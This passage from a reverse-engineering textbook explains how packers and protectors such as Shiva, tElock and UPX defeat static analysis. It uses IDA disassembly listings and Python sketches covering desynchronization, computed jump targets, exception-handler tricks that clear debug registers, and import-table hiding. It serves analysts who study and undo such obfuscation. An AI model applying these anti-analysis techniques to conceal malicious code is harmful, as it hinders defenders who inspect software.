LOAD:0A04B0DB ;------------------------------------------------------------

LOAD:0A04B0DD db 0E0h ; a

2. The x86 iret instruction is used to return from an interrupt-handling routine. Interrupt-handling routines are most often found in kernel space.

At this point, it is somewhat more obvious that the byte at address 0A04B0D6 ➊ is never executed. The instruction at 0A04B0D7 ➋ (the target of the call) is used to clear the return address (from the bogus call) off the stack, and execution continues. Note that it does not take long before the technique is used again, this time using a 2-byte jump instruction at address 0A04B0DB ➌, which actually jumps into the middle of itself. Here again, we are obligated to undefine an instruction in order to get to the start of the next instruction. One more application of the undefine (at 0A04B0DB) and redefine (at 0A04B0DC) processes yields the following disassembly:

➋ LOAD:0A04B0D7 pop eax

➌ LOAD:0A04B0D8 lea eax, [eax+0Ah]

LOAD:0A04B0D8 ; --------------------------------------------------------------

LOAD:0A04B0DB db 0EBh ; d

LOAD:0A04B0DC ; --------------------------------------------------------------

➊ LOAD:0A04B0DC jmp eax

LOAD:0A04B0DC start endp

The target of the jump instruction turns out to be yet another jump instruction ➊. In this case, however, the jump is impossible for a disassembler (and potentially confusing to the human analyst) to follow, as the target of the jump is contained in a register (EAX) and computed at runtime. This is an example of another type of anti–static analysis technique, discussed in “Dynamically Computed Target Addresses” on page 437. In this case the value contained in the EAX register is not difficult to determine given the relatively simple instruction sequence that precedes the jump. The pop instruction at ➋ loads the return address from the call instruction in the previous example (0A04B0D6) into the EAX register, while the following instruction ➌ has the effect of adding 10 to EAX. Thus the target of the jump instruction is 0A04B0E0, and this is the address at which we must resume the disassembly process.
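The desynchronization in the Shiva example can be reproduced with a few lines of Python. This is a toy sketch rather than a real disassembler: the byte values are reconstructed from the listings (an assumption, since the book does not show raw bytes), and the hypothetical length function understands only the handful of opcodes that occur in those bytes. It contrasts decoding back to back from 0A04B0D6, as happens when the call is assumed to return, with decoding along the path the processor actually follows from 0A04B0D7.

```python
BASE = 0x0A04B0D6
# Bytes at 0A04B0D6..0A04B0DE, reconstructed from the listings (an assumption).
# The final 0x90 is inferred from the displayed loopne target.
CODE = bytes([0xC7, 0x58, 0x8D, 0x40, 0x0A, 0xEB, 0xFF, 0xE0, 0x90])


def length(code, i):
    """Toy length decoder covering only the opcodes that occur in CODE."""
    op = code[i]
    if op == 0xC7:                          # mov r/m32, imm32 with a [reg+disp8] operand
        return 7
    if 0x58 <= op <= 0x5F:                  # pop r32
        return 1
    if op == 0x8D:                          # lea r32, [reg+disp8]
        return 3
    if op in (0xEB, 0xE0):                  # jmp short rel8 / loopne rel8
        return 2
    if op == 0xFF and code[i + 1] == 0xE0:  # jmp eax
        return 2
    raise ValueError(f"opcode {op:#x} not handled by this sketch")


def linear_sweep(code, start):
    """Decode instructions back to back, ignoring control flow."""
    out, i = [], start
    while i < len(code) and i + length(code, i) <= len(code):
        out.append(BASE + i)
        i += length(code, i)
    return out


def follow_flow(code, start):
    """Decode along the execution path, following short jumps."""
    out, i = [], start
    while True:
        out.append(BASE + i)
        op, n = code[i], length(code, i)
        if op == 0xFF:                      # jmp eax: target known only at run time
            return out
        if op == 0xEB:                      # rel8 is signed, relative to the next instruction
            rel = code[i + 1] - 256 if code[i + 1] > 127 else code[i + 1]
            i = i + n + rel
        else:
            i += n


print([hex(a) for a in linear_sweep(CODE, 0)])  # ['0xa04b0d6', '0xa04b0dd']
print([hex(a) for a in follow_flow(CODE, 1)])   # ['0xa04b0d7', '0xa04b0d8', '0xa04b0db', '0xa04b0dc']

# pop eax receives the return address of the 5-byte call at 0A04B0D1;
# lea eax, [eax+0Ah] then adds 10 to form the jmp eax target.
return_address = 0x0A04B0D1 + 5
jump_target = return_address + 0x0A
print(hex(jump_target))  # 0xa04b0e0
```

The two address lists have no element in common, which is exactly what desynchronization means: none of the instruction boundaries chosen by the sweep coincide with the boundaries that are executed.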

The final example of desynchronization, taken from a different binary, demonstrates how processor flags may be utilized to turn conditional jumps into unconditional jumps. The following disassembly demonstrates the use of the x86 Z flag for just such a purpose:

➊ .text:00401000 xor eax, eax

➋ .text:00401002 jz short near ptr loc_401009+1

➌ .text:00401004 mov ebx, [eax]

➍ .text:00401006 mov [ecx-4], ebx

.text:00401009

.text:00401009 loc_401009: ; CODE XREF: .text:00401002↑j

➎ .text:00401009 call near ptr 0ADFEFFC6h

.text:0040100E ficom word ptr [eax+59h]

Here, the xor instruction ➊ is used to zero the EAX register and set the x86 Z flag. The programmer, knowing that the Z flag is set, utilizes a jump-on-zero (jz) instruction ➋, which will always be taken, to attain the effect of an unconditional jump. As a result, the instructions ➌ and ➍ between the jump and the jump target will never be executed and serve only to confuse any analyst who fails to realize this fact. Note that, once again, this example obscures the actual jump target by jumping into the middle of an instruction ➎. Properly disassembled, the code should read as follows:

.text:00401000 xor eax, eax

.text:00401002 jz short loc_40100A

.text:00401004 mov ebx, [eax]

.text:00401006 mov [ecx-4], ebx

.text:00401006 ; -------------------------------------------------------------

➋ .text:00401009 db 0E8h ; F

.text:0040100A ; -------------------------------------------------------------

.text:0040100A

.text:0040100A loc_40100A: ; CODE XREF: .text:00401002↑j

➊ .text:0040100A mov eax, 0DEADBEEFh

.text:0040100F push eax

.text:00401010 pop ecx

The actual target of the jump ➊ has been revealed, as has the extra byte ➋ that caused the desynchronization in the first place. It is certainly possible to use far more roundabout ways of setting and testing flags prior to executing a conditional jump. The level of difficulty for analyzing such code increases with the number of operations that may affect the CPU flag bits prior to testing their value.
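Two facts in this example can be checked with simple arithmetic. The Python sketch below is illustrative only: xor_sets_zf and misread_call_target are hypothetical helper names. It first confirms that xor of a register with itself always produces zero (so the jz is always taken), and then shows where the meaningless call target 0ADFEFFC6h comes from: the stray 0E8h byte is a call opcode that swallows the first four bytes of the real mov eax, 0DEADBEEFh instruction (encoded as B8 EF BE AD DE) as its 32-bit displacement.

```python
def xor_sets_zf(value):
    """xor reg, reg always yields 0, so the Z flag is always set afterwards."""
    return (value ^ value) == 0


# The jz at 00401002 is therefore taken for every possible EAX value.
assert all(xor_sets_zf(v) for v in (0, 1, 0x7FFFFFFF, 0xFFFFFFFF))

# Bytes starting at 00401009: the stray 0E8h, then mov eax, 0DEADBEEFh.
ADDR = 0x00401009
CODE = bytes([0xE8, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE])


def misread_call_target(addr, code):
    """Decode E8 rel32 the way a desynchronized disassembler would.

    The displacement is a signed little-endian 32-bit value relative to the
    address of the next instruction (addr + 5).
    """
    rel32 = int.from_bytes(code[1:5], "little", signed=True)
    return (addr + 5 + rel32) & 0xFFFFFFFF


print(hex(misread_call_target(ADDR, CODE)))  # 0xadfeffc6
```

An implausible call target such as this one, far outside the program's address range, is often a quick visual hint that the surrounding disassembly is out of step with the real instruction stream.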

Dynamically Computed Target Addresses

Do not confuse the title of this section with an anti–dynamic analysis tech-

nique. The phrase dynamically computed simply means that an address to which

execution will flow is computed at runtime. In this section we discuss several

ways in which such an address can be derived. The intent of such techniques is

to hide (obfuscate) the actual control flow path that a binary will follow from

the prying eyes of the static analysis process.

One example of this technique was shown in the preceding section. The

example used a call statement to place a return address on the stack. The

return address was popped directly off the stack into a register, and a constant

value was added to the register to derive the final target address, which was

ultimately reached by performing a jump to the location specified by the reg-

ister contents.

An infinite number of similar code sequences can be developed for

deriving a target address and transferring control to that address. The follow-

ing code, which wraps up the initial startup sequence in Shiva, demonstrates

an alternate method for dynamically computing target addresses:

LOAD:0A04B3BE mov ecx, 7F131760h ; ecx = 7F131760

LOAD:0A04B3C3 xor edi, edi ; edi = 00000000

LOAD:0A04B3C5 mov di, 1156h ; edi = 00001156

LOAD:0A04B3C9 add edi, 133AC000h ; edi = 133AD156

LOAD:0A04B3CF xor ecx, edi ; ecx = 6C29C636

LOAD:0A04B3D1 sub ecx, 622545CEh ; ecx = 0A048068

LOAD:0A04B3D7 mov edi, ecx ; edi = 0A048068

LOAD:0A04B3D9 pop eax

LOAD:0A04B3DA pop esi

LOAD:0A04B3DB pop ebx

LOAD:0A04B3DC pop edx

LOAD:0A04B3DD pop ecx

X LOAD:0A04B3DE xchg edi, [esp] ; TOS = 0A048068

LOAD:0A04B3E1 retn ; return to 0A048068

The comments in the right-hand margin document the changes being

made to various CPU registers at each instruction. The process culminates in

a derived value being moved into the top position of the stack (TOS) X, which

causes the return instruction to transfer control to the computed location

(0A048068 in this case). Code sequences such as these can significantly increase

the amount of work that must be performed during static analysis, as the

analyst must essentially run the code by hand to determine the actual control

flow path taken in the program.
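
The hand computation annotated in the Shiva listing can be double-checked with a few lines of Python. This is only a sketch of the register arithmetic, not a general emulator: the helper name shiva_target and the 32-bit masking are illustrative assumptions, and only the constants come from the listing.

```python
MASK32 = 0xFFFFFFFF  # x86 general-purpose registers wrap at 32 bits


def shiva_target():
    """Replay the register arithmetic from the Shiva listing."""
    ecx = 0x7F131760                       # mov ecx, 7F131760h
    edi = 0                                # xor edi, edi
    edi = (edi & 0xFFFF0000) | 0x1156      # mov di, 1156h (low 16 bits only)
    edi = (edi + 0x133AC000) & MASK32      # add edi, 133AC000h
    ecx ^= edi                             # xor ecx, edi
    ecx = (ecx - 0x622545CE) & MASK32      # sub ecx, 622545CEh
    edi = ecx                              # mov edi, ecx
    return edi                             # value swapped onto the stack for retn


print(hex(shiva_target()))  # 0xa048068
```

The five pop instructions are left out because they do not influence the computed value; they only reposition the stack pointer before the xchg.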

Much more complex types of control flow hiding have been developed

and utilized in recent years. In the most complex cases, a program will use

multiple threads or child processes to compute control flow information and

receive that information via some form of interprocess communication (for

child processes) or synchronization primitives (for multiple threads). In such

cases, static analysis can become extremely difficult, as it becomes necessary

to understand not only the behavior of multiple executable entities but also

the exact manner by which those entities exchange information. For example,

one thread may wait on a shared semaphore3 object, while a second thread

computes values or modifies code that the first thread will make use of once

the second thread signals its completion via the semaphore.
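
The two-thread arrangement just described might be modeled as follows. This is a minimal sketch using Python's threading module rather than anything taken from a real obfuscator; the names producer, consumer, and shared are hypothetical, and the arithmetic inside producer is just a placeholder for "some computed control flow value."

```python
import threading

ready = threading.Semaphore(0)   # starts unavailable, so the consumer blocks
shared = {}                      # stands in for memory both threads can see


def producer():
    # Second thread: derive the control flow information, then signal.
    shared["target"] = (0x7F131760 ^ 0x133AD156) - 0x622545CE
    ready.release()


def consumer(results):
    # First thread: wait for the signal before using the computed value.
    ready.acquire()
    results.append(shared["target"])


results = []
t1 = threading.Thread(target=consumer, args=(results,))
t2 = threading.Thread(target=producer)
t1.start()
t2.start()
t1.join()
t2.join()
print(hex(results[0]))
```

An analyst reading only the consumer's code sees a wait followed by the use of a value that is never computed locally, which is exactly what makes this arrangement tedious to follow statically.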

Another technique, frequently used within Windows-oriented malware,

involves configuring an exception handler,4 intentionally triggering an

exception, and then manipulating the state of the process’s registers while

handling the exception. The following example is used by the tElock anti–

reverse engineering tool to obscure the program’s actual control flow:

X .shrink:0041D07A call $+5

Y .shrink:0041D07F pop ebp

Z .shrink:0041D080 lea eax, [ebp+46h] ; eax holds 0041D07F + 46h

[ .shrink:0041D083 push eax

.shrink:0041D084 xor eax, eax

\ .shrink:0041D086 push dword ptr fs:[eax]

] .shrink:0041D089 mov fs:[eax], esp

3. Think of a semaphore as a token that must be in your possession before you can enter a room to

perform some action. While you hold the token, no other person may enter the room. When

you have finished with your task in the room, you may leave and give the token to someone else,

who may then enter the room and take advantage of the work you have done (without your

knowledge because you are no longer in the room!). Semaphores are often used to enforce

mutual exclusion locks around code or data in a program.

4. For more information on Windows Structured Exception Handling (SEH), see http://

www.microsoft.com/msj/0197/exception/exception.aspx.

^ .shrink:0041D08C int 3 ; Trap to Debugger

.shrink:0041D08D nop

.shrink:0041D08E mov eax, eax

.shrink:0041D090 stc

.shrink:0041D091 nop

.shrink:0041D092 lea eax, ds:1234h[ebx*2]

.shrink:0041D099 clc

.shrink:0041D09A nop

.shrink:0041D09B shr ebx, 5

.shrink:0041D09E cld

.shrink:0041D09F nop

.shrink:0041D0A0 rol eax, 7

.shrink:0041D0A3 nop

.shrink:0041D0A4 nop

_ .shrink:0041D0A5 xor ebx, ebx

` .shrink:0041D0A7 div ebx ; Divide by zero

.shrink:0041D0A9 pop dword ptr fs:0

The sequence begins by using a call X to the next instruction Y; the

call instruction pushes 0041D07F onto the stack as a return address, which is

promptly popped off the stack into the EBP register Y. Next Z, the EAX register

is loaded with the value 0041D0C5 (0041D07F + 46h), which is then

pushed onto the stack [ as the address of an exception handler function.

The remainder of the exception handler setup takes place at \ and ],

which complete the process of linking the new exception handler into the

existing chain of exception handlers referenced by fs:[0].5 The next step is

to intentionally generate an exception ^, in this case an int 3, which is a soft-

ware trap (interrupt) to the debugger. In x86 programs, the int 3 instruction

is used by debuggers to implement a software breakpoint. Normally at this

point, an attached debugger would gain control; in fact, if a debugger is

attached, it will have the first opportunity to handle the exception, thinking

that it is a breakpoint. In this case, the program fully expects to handle the

exception, so any attached debugger must be instructed to pass the exception

along to the program. Failing to allow the program to handle the exception

may result in an incorrect operation and possibly a crash of the program.

Without understanding how the int 3 exception is handled, it is impossible

to know what may happen next in this program. If we assume that execution

simply resumes following the int 3, then it appears that a divide-by-zero

exception will eventually be triggered by instructions _ and `.
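
The address arithmetic behind the call/pop/lea sequence is easy to verify. The following sketch assumes only that the call instruction is five bytes long (one opcode byte plus a 4-byte displacement); the variable names are illustrative.

```python
CALL_ADDRESS = 0x0041D07A   # address of "call $+5" in the listing
CALL_LENGTH = 5             # opcode E8 plus a 4-byte relative displacement

return_address = CALL_ADDRESS + CALL_LENGTH   # pushed by call, popped into ebp
handler_address = return_address + 0x46       # lea eax, [ebp+46h]

print(f"ebp     = {return_address:08X}")      # ebp     = 0041D07F
print(f"handler = {handler_address:08X}")     # handler = 0041D0C5
```

The second value is the address that gets pushed as the new exception handler, so it is the natural place to continue reading the disassembly.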

The exception handler associated with the preceding code begins at

address 0041D0C5. The first portion of this function is shown here:

.shrink:0041D0C5 sub_41D0C5 proc near ; DATA XREF: .stack:0012FF9C↑o

.shrink:0041D0C5

.shrink:0041D0C5 pEXCEPTION_RECORD = dword ptr 4

.shrink:0041D0C5 arg_4 = dword ptr 8

X .shrink:0041D0C5 pCONTEXT = dword ptr 0Ch

5. Windows configures the FS register to point to the base address of the current thread’s

environment block (TEB). The first item (offset zero) in a TEB is the head of a linked list of

pointers to exception handler functions, which are called in turn when an exception is raised

in a process.

.shrink:0041D0C5

[ .shrink:0041D0C5 mov eax, [esp+pEXCEPTION_RECORD]

Y .shrink:0041D0C9 mov ecx, [esp+pCONTEXT] ; Address of SEH CONTEXT

Z .shrink:0041D0CD inc [ecx+CONTEXT._Eip] ; Modify saved eip

\ .shrink:0041D0D3 mov eax, [eax] ; Obtain exception type

] .shrink:0041D0D5 cmp eax, EXCEPTION_INT_DIVIDE_BY_ZERO

.shrink:0041D0DA jnz short loc_41D100

.shrink:0041D0DC inc [ecx+CONTEXT._Eip] ; Modify eip again

^ .shrink:0041D0E2 xor eax, eax ; Zero x86 debug registers

.shrink:0041D0E4 and [ecx+CONTEXT.Dr0], eax

.shrink:0041D0E7 and [ecx+CONTEXT.Dr1], eax

.shrink:0041D0EA and [ecx+CONTEXT.Dr2], eax

.shrink:0041D0ED and [ecx+CONTEXT.Dr3], eax

.shrink:0041D0F0 and [ecx+CONTEXT.Dr6], 0FFFF0FF0h

.shrink:0041D0F7 and [ecx+CONTEXT.Dr7], 0DC00h

.shrink:0041D0FE jmp short locret_41D160

The third argument X to the exception handler function is a pointer to

a Windows CONTEXT structure (defined in the Windows API header file winnt.h).

The CONTEXT structure is initialized with the contents of all CPU registers as

they existed at the time of the exception. An exception handler has the

opportunity to inspect and, if desired, modify the contents of the CONTEXT

structure. If the exception handler feels that it has corrected the problem

that led to the exception, it can notify the operating system that the offending

thread should be allowed to continue. At this point the operating system

reloads the CPU registers for the thread from the CONTEXT structure that was

provided to the exception handler, and execution of the thread resumes as

if nothing had ever happened.

In the preceding example, the exception handler begins by accessing

the thread’s CONTEXT Y in order to increment the instruction pointer Z,

thus moving beyond the instruction that generated the exception. Next,

the exception’s type code (a field within the provided EXCEPTION_RECORD [) is

retrieved \ in order to determine the nature of the exception. This portion

of the exception handler deals with the divide-by-zero error ], generated

in the previous example, by zeroing ^ all of the x86 hardware debugging

registers.6 Without examining the remainder of the tElock code, it is not

immediately apparent why the debug registers are being cleared. In this

case, tElock is clearing values from a previous operation in which it used

the debug registers to set four breakpoints in addition to the int 3 seen pre-

viously. In addition to obfuscating the true flow of the program, clearing or

modifying the x86 debug registers can wreak havoc with software debuggers

such as OllyDbg or IDA’s own internal debugger. Such anti-debugging tech-

niques are discussed in “Anti–Dynamic Analysis Techniques” on page 449.
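
To make the handler's effect on the saved register state concrete, the visible portion of sub_41D0C5 can be modeled on a plain dictionary. This is a sketch under stated assumptions: the dictionary stands in for the CONTEXT structure, the starting debug register values are invented, and the saved Eip for the divide error is assumed to point at the div instruction itself (0041D0A7). The path taken for other exception types (loc_41D100) is not shown in the listing and is not modeled.

```python
EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094  # value defined in the Windows headers


def telock_handler(exception_code, context):
    """Model the visible part of sub_41D0C5 on a dict standing in for CONTEXT."""
    context["Eip"] += 1                          # inc [ecx+CONTEXT._Eip]
    if exception_code != EXCEPTION_INT_DIVIDE_BY_ZERO:
        return context                           # loc_41D100 path is not shown
    context["Eip"] += 1                          # second inc: skip 2-byte div ebx
    for reg in ("Dr0", "Dr1", "Dr2", "Dr3"):
        context[reg] &= 0                        # and [ecx+CONTEXT.DrN], eax (eax = 0)
    context["Dr6"] &= 0xFFFF0FF0
    context["Dr7"] &= 0x0000DC00
    return context


ctx = {"Eip": 0x0041D0A7, "Dr0": 0x401000, "Dr1": 0x401010,
       "Dr2": 0x401020, "Dr3": 0x401030, "Dr6": 0xFFFFFFFF, "Dr7": 0xFFFFFFFF}
telock_handler(EXCEPTION_INT_DIVIDE_BY_ZERO, ctx)
print(f"{ctx['Eip']:08X}")  # 0041D0A9
```

Under these assumptions execution resumes at 0041D0A9, the pop dword ptr fs:0 that follows the div in the earlier listing, and any hardware breakpoint addresses held in Dr0 through Dr3 are gone.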

Opcode Obfuscation

While the techniques described to this point may provide—in fact, are

intended to provide—a hindrance to understanding a program’s control

6. In the x86, debug registers 0 through 7 (Dr0 through Dr7) are used to control the use of

hardware-assisted breakpoints. Dr0 through Dr3 are used to specify breakpoint addresses,

Dr7 is used to enable and configure specific hardware breakpoints, and Dr6 reports which breakpoint conditions have been triggered.

flow, none prevent you from observing the correct disassembled form of a

program you are analyzing. Desynchronization had the greatest impact on

the disassembly, but it was easily defeated by reformatting the disassembly to

reflect the correct instruction flow.

A more effective technique for preventing correct disassembly is to encode

or encrypt the actual instructions when the executable file is being created.

The obfuscated instructions are useless to the CPU and must be de-obfuscated

back to their original form before they are fetched for execution by the CPU.

Therefore, at least some portion of the program must remain unencrypted

in order to serve as the startup routine, which, in the case of an obfuscated

program, is usually responsible for de-obfuscating some or all of the remainder

of the program. A very generic overview of the obfuscation process is shown

in Figure 21-1.

Figure 21-1: Generic obfuscation process

As shown, the input to the process is a program that a user wishes to

obfuscate for some reason. In many cases, the input program is written using

standard programming languages and build tools (editors, compilers, and the

like) with little thought required about the obfuscation to come. The resulting

executable file is fed into an obfuscation utility, which transforms the binary

into a functionally equivalent, yet obfuscated, binary. As depicted, the obfusca-

tion utility is responsible for obfuscating the original program’s code and

data sections and adding additional code (a de-obfuscation stub) that per-

forms the task of de-obfuscating the code and data before the original func-

tionality can be accessed at runtime. The obfuscation utility also modifies the

program headers to redirect the program entry point to the de-obfuscation

stub, ensuring that execution begins with the de-obfuscation process. Follow-

ing de-obfuscation, execution typically transfers to the entry point of the

original program, which begins execution as if it had never been obfuscated

at all.
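
The flow just described can be illustrated with a deliberately tiny model. In this sketch a "program" is a dictionary with an entry point, code, and data; the single-byte XOR encoding and the names obfuscate and run_stub are assumptions made for illustration and do not correspond to any particular obfuscation utility.

```python
def _xor(blob, key):
    """Apply a single-byte XOR; the same call both encodes and decodes."""
    return bytes(b ^ key for b in blob)


def obfuscate(program, key=0x5A):
    """Return a toy obfuscated copy of program (a dict with header fields)."""
    return {
        "entry_point": "stub",              # header redirected to the stub
        "oep": program["entry_point"],      # original entry point, kept for later
        "key": key,
        "code": _xor(program["code"], key),
        "data": _xor(program["data"], key),
    }


def run_stub(packed):
    """Act as the de-obfuscation stub: restore code and data, then hand
    back the program as it looked before obfuscation."""
    return {
        "entry_point": packed["oep"],       # transfer to the OEP
        "code": _xor(packed["code"], packed["key"]),
        "data": _xor(packed["data"], packed["key"]),
    }


original = {"entry_point": 0x401000, "code": b"\x55\x8b\xec\xc3", "data": b"hello"}
packed = obfuscate(original)
print(packed["code"].hex())
print(run_stub(packed) == original)  # True
```

A disassembler pointed at the packed dictionary sees only the encoded bytes; everything needed to undo the encoding lives in the stub, which is why the stub is the first thing to analyze.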

This oversimplified process varies widely based on the obfuscation util-

ity that is used to create the obfuscated binary. An ever-increasing number

of utilities are available to handle the obfuscation process. Such utilities offer

features ranging from compression to anti-disassembly and anti-debugging

techniques. Examples include programs such as UPX7 (compressor, also works

with ELF), ASPack8 (compressor), ASProtect (anti–reverse engineering by the

7. See http://upx.sourceforge.net/.

8. See http://www.aspack.com/.

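[Figure 21-1 diagram: the Original Program (header, code, data; entry point) passes through the Obfuscator to yield the Obfuscated Program (header, obfuscated code, obfuscated data, de-obfuscation stub). The modified entry point leads to the stub, which finally transfers to the original entry point (OEP).]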

makers of ASPack), and tElock9 (compression and anti–reverse engineering)

for Windows PE files, and Burneye10 (encryption) and Shiva11 (encryption

and anti-debugging) for Linux ELF binaries. The capabilities of obfuscation

utilities have advanced to the point that some anti–reverse engineering tools

such as WinLicense12 provide more integration throughout the entire build

process, allowing programmers to integrate anti–reverse engineering fea-

tures at every step, from source code through post-processing the compiled

binary file.

A more recent evolution in the world of obfuscation programs involves

wrapping the original executable with a virtual machine execution engine.

Depending on the sophistication of the virtualizing obfuscator, the original

machine code may never execute directly; instead that code is interpreted

by a byte code–oriented virtual machine. Very sophisticated virtualizers are

capable of generating unique virtual machine instances each time they run,

making it difficult to create an all-purpose de-obfuscation algorithm to defeat

them. VMProtect13 is one example of a virtualizing obfuscator. VMProtect

was used to obfuscate the Clampi14 trojan.

As with any offensive technology, defensive measures have been developed

to counter many anti–reverse engineering tools. In most cases the goal of

such tools is to recover the original, unprotected executable file (or a reason-

able facsimile), which can then be analyzed using more traditional tools such

as disassemblers and debuggers. One such tool designed to de-obfuscate

Windows executables is called QuickUnpack.15 QuickUnpack, like many

other automated unpackers, operates by functioning as a debugger and

allowing an obfuscated binary to execute through its de-obfuscation phase

and then capturing the process image from memory. Beware that this type of

tool actually runs potentially malicious programs in the hope of intercepting

the execution of those programs after they have unpacked or de-obfuscated

themselves but before they have a chance to do anything malicious. Thus,

you should always execute such programs in a sandbox-type environment.

Using a purely static analysis environment to analyze obfuscated code is

a challenging task at best. Without being able to execute the de-obfuscation

stub, some means of unpacking or decrypting the obfuscated portions of

the binary must be employed before disassembly of the obfuscated code can

begin. Figure 21-2 shows the layout of an executable that has been packed

using the UPX packer. The only portion of the address space that IDA has

identified as code is the thin stripe at X, which happens to be the UPX

decompression stub.

9. See http://www.softpedia.com/get/Programming/Packers-Crypters-Protectors/Telock.shtml.

10. See http://www.packetstormsecurity.org/groups/teso/indexdate.html.

11. See http://www.cansecwest.com/core03/shiva.ppt (tool: http://www.securiteam.com/tools/

5XP041FA0U.html).

12. See http://www.oreans.com/winlicense.php.

13. See http://www.vmpsoft.com/.

14. See http://www.symantec.com/connect/blogs/inside-jaws-trojanclampi.

15. See http://qunpack.ahteam.org/wp2/ (Russian) or http://www.woodmann.com/collaborative/tools/

index.php/Quick_Unpack.

Figure 21-2: IDA navigation band for a binary packed using UPX

Examination of the contents of the address space would reveal empty

space to the left of Y and apparently random data in the region between X

and Y. The random data is the result of the UPX compression process, and

the job of the decompression stub is to unpack that data into the empty

region at the left of the navigation band before finally transferring control

to the unpacked code. Note that the unusual appearance of the navigation

band is a potential tip-off that this binary has been obfuscated in some man-

ner. In fact, a number of things typically stand out when viewing an obfus-

cated binary with IDA. Some potential tip-offs that a binary is obfuscated

include the following:

- Very little code is highlighted in the navigation band.
- Very few functions are listed in the Functions window. Often only the start function will appear.
- Very few imported functions are listed in the Imports window.
- Very few legible strings appear in the Strings window (not opened by default). Often only the names of the few imported libraries and functions will be visible.
- One or more program sections will be both writable and executable.
- Nonstandard section names such as UPX0 or .shrink are used.



SANDBOX ENVIRONMENTS

The purpose of a sandbox environment for reverse engineering is to allow you to

execute a program in a manner that allows observation of the program’s behavior

without allowing that behavior to adversely impact critical components of your

reverse engineering platform. Sandbox environments are commonly constructed

using platform virtualization software such as VMware,* but they may also be

constructed on dedicated systems that are capable of being restored to a known good

state following the execution of any malware.

A common feature of sandbox systems is the fact that they are typically heavily

instrumented in order to observe and collect information on the behavior of programs

run within the sandbox. Collected data may include information on the file system

activity of a program, on the registry activity of a (Windows) program, and about

any networking activity generated by the program.

*See http://www.vmware.com/.

The information presented in the navigation band can be correlated

with the properties of each segment within the binary to determine whether

the information presented in each display is consistent. The segments listing

for this binary is shown here:

  Name    Start     End       R W X D L  Align  Base  Type    Class
X UPX0    00401000  00407000  R W X . L  para   0001  public  CODE
Y UPX1    00407000  00409000  R W X . L  para   0002  public  CODE
  UPX2    00409000  0040908C  R W . . L  para   0003  public  DATA
  .idata  0040908C  004090C0  R W . . L  para   0003  public  XTRN
  UPX2    004090C0  0040A000  R W . . L  para   0003  public  DATA

In this case, the entire range of addresses comprising segment UPX0 X

and segment UPX1 Y (00401000-00409000) is marked as executable (the X flag

is set). Given this fact, we should expect to see the entire navigation band

colorized to represent code. The fact that we do not, coupled with the fact

that inspection reveals the entire range of UPX0 to be empty, should be con-

sidered highly suspicious. Within IDA, the section header for UPX0 contains

the following lines:

UPX0:00401000 ; Section 1. (virtual address 00001000)

UPX0:00401000 ; Virtual size : 00006000 ( 24576.)

X UPX0:00401000 ; Section size in file : 00000000 ( 0.)

UPX0:00401000 ; Offset to raw data for section: 00000200

Y UPX0:00401000 ; Flags E0000080: Bss Executable Readable Writable

Techniques for using IDA to perform the decompression operation in a

static context (without actually executing the binary) are discussed in “Static

De-obfuscation of Binaries Using IDA” on page 454.
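
Two of the tip-offs discussed above (sections that are both writable and executable, and nonstandard section names) lend themselves to a quick mechanical check. The sketch below works on rows transcribed from the segments listing; it is plain Python rather than an IDA script, and both the function name suspicious_segments and the COMMON_NAMES allow-list are assumptions chosen for illustration.

```python
# Rows copied from the segments listing: name, start, end, permissions.
SEGMENTS = [
    ("UPX0",   0x00401000, 0x00407000, "RWX"),
    ("UPX1",   0x00407000, 0x00409000, "RWX"),
    ("UPX2",   0x00409000, 0x0040908C, "RW"),
    (".idata", 0x0040908C, 0x004090C0, "RW"),
    ("UPX2",   0x004090C0, 0x0040A000, "RW"),
]

# Hypothetical allow-list of section names a typical compiler emits.
COMMON_NAMES = {".text", ".data", ".rdata", ".idata", ".rsrc", ".reloc", ".bss"}


def suspicious_segments(segments):
    """Return (name, reasons) pairs for segments matching the tip-offs."""
    findings = []
    for name, _start, _end, perms in segments:
        reasons = []
        if "W" in perms and "X" in perms:
            reasons.append("writable and executable")
        if name not in COMMON_NAMES:
            reasons.append("nonstandard name")
        if reasons:
            findings.append((name, reasons))
    return findings


for name, reasons in suspicious_segments(SEGMENTS):
    print(name, "->", ", ".join(reasons))
```

A result like this is only a hint, since legitimate programs occasionally use unusual section names or self-modifying code, but several hits at once are a good reason to look for a de-obfuscation stub.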

Imported Function Obfuscation

In order to avoid leaking information about potential actions that a binary

may perform, an additional anti–static analysis technique is aimed at making

it difficult to determine which shared libraries and library functions are used

within an obfuscated binary. In most cases, it is possible to render tools such

as dumpbin, ldd, and objdump ineffective for the purposes of listing library

dependencies.

The effect of such obfuscations on IDA is most obvious in the Imports

window. The entire content of the Imports window for our earlier tElock

example is shown here:

Address   Ordinal  Name              Library
0041EC2E           GetModuleHandleA  kernel32
0041EC36           MessageBoxA       user32

Only two external functions are referenced, GetModuleHandleA (from

kernel32.dll) and MessageBoxA (from user32.dll). Virtually nothing about the

behavior of the program can be inferred from this short list. How then does

such a program get anything useful accomplished? Here again the techniques

are varied, but they essentially boil down to the fact that the program itself

must load any additional libraries that it depends on, and once the libraries

are loaded, the program must locate any required functions within those

libraries. In most cases, these tasks are performed by the de-obfuscation stub

prior to transferring control to the de-obfuscated program. The end goal is

for the program’s import table to have been properly initialized, just as if the

process had been performed by the operating system’s own loader.

For Windows binaries, a simple approach is to use the LoadLibrary function

to load required libraries by name and then perform function address lookups

within each library using the GetProcAddress function. In order to use these

functions, a program must be either explicitly linked to them or have an

alternate means of looking them up. The Imports listing for the tElock example

does not include either of these functions, while the Imports listing for the

UPX example shown here includes both.

Address   Ordinal  Name            Library
0040908C           LoadLibraryA    KERNEL32
00409090           GetProcAddress  KERNEL32
00409094           ExitProcess     KERNEL32
0040909C           RegCloseKey     ADVAPI32
004090A4           atoi            CRTDLL
004090AC           ExitWindowsEx   USER32
004090B4           InternetOpenA   WININET
004090BC           recv            wsock32

The actual UPX code responsible for rebuilding the import table is

shown in Listing 21-1.

UPX1:0040886C loc_40886C: ; CODE XREF: start+12E↓j

UPX1:0040886C mov eax, [edi]

UPX1:0040886E or eax, eax

UPX1:00408870 jz short loc_4088AE

UPX1:00408872 mov ebx, [edi+4]

UPX1:00408875 lea eax, [eax+esi+8000h]

UPX1:0040887C add ebx, esi

UPX1:0040887E push eax

UPX1:0040887F add edi, 8

X UPX1:00408882 call dword ptr [esi+808Ch] ; LoadLibraryA

UPX1:00408888 xchg eax, ebp

UPX1:00408889

UPX1:00408889 loc_408889: ; CODE XREF: start+146↓j

UPX1:00408889 mov al, [edi]

UPX1:0040888B inc edi

